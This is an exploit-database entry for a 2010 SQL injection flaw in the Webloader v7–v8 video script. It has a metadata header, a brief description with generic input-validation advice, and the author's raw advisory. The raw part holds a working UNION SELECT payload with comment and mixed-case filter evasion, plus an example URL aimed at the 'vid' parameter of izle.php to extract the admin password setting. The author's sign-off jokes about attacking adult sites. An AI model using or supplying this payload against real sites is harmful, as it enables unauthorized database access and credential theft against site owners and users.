Webloader v7 - v8 ( vid ) SQL Injection Vulnerability

vendor:

Webloader v7 - v8 ( vid )

by:

ByEge

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Webloader v7 - v8 ( vid )

Affected Version From: v7

Affected Version To: v8

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Webloader v7 – v8 ( vid ) SQL Injection Vulnerability

Webloader v7 - v8 ( vid ) is vulnerable to SQL Injection. An attacker can inject malicious SQL queries to the vulnerable parameter and gain access to the database. This can lead to unauthorized access to sensitive information such as usernames, passwords, and other confidential data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Title: Webloader v7 - v8 ( vid ) SQL Injection Vulnerability                                                                             [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Date: 18.05.2010                                                                                                                         [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Script Home: www.webloader.org                                                                                                           [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Author: ByEge                                                                                                                            [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Homepage: byege.blogspot.com                                                                                                             [*][*]
[*][*]                                                                                                                                           [*][*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Google Dork : Coded By WebLOADER                                                                                                         [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  ExploiT     :                                                                                                                            [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  '/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre                                [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Example     :                                                                                                                            [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]  http://server/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]                                                                                                                                           [*][*]
[*][*]                                                                                                                                           [*][*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*][*]                                                                                                                                           [*][*]
[*][*]  Th4nks :  Fantastik, MitolocyA, ISYAN,                                                                                                   [*][*]
[*][*]  Ege'nin sözü :  Hep adult Siteler Sizi Tatmin Edecek Deilya Birazda Siz Adult Siteleri Tatmin Edin :)                                    [*][*]
[*][*]                                                                                                                                           [*][*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]
[*]~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~(*)~[*]